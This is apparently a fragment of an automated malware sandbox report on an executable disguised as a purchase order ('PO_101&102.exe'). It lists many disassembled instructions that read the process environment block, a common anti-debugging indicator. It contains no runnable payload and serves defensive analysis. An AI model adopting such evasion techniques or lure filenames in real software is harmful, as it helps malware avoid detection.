          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01652990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016F1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01640050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01640050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0163B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0163B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0163B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0163B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016F4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016F4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016258EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016BB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016690AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01629080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0162DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01653B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01653B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0162DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016F8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0162F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016D23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016D23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016D23E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01654BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01654BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01654BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016F5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01631B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01631B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016DD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01652397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164EB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164EB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016F8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0166927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01629240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01629240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01629240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01629240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016EEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016B4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01664A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01664A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01638A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01625210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01625210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01625210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01625210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0162AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0162AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01643A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01652AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01652ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0163AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0163AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01663D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016D3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01647D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165F527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165F527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165F527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0162AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016EE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016F8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016AA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01654D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01654D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01654D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0163D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0163D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016D8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016F05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016F05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016535A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01651DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01651DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01651DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01652581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01652581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01652581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01652581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01622D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01622D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01622D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01622D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_01622D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_016E2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0165FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 10_2_0164746D mov eax, dword ptr fs:[00000030h]
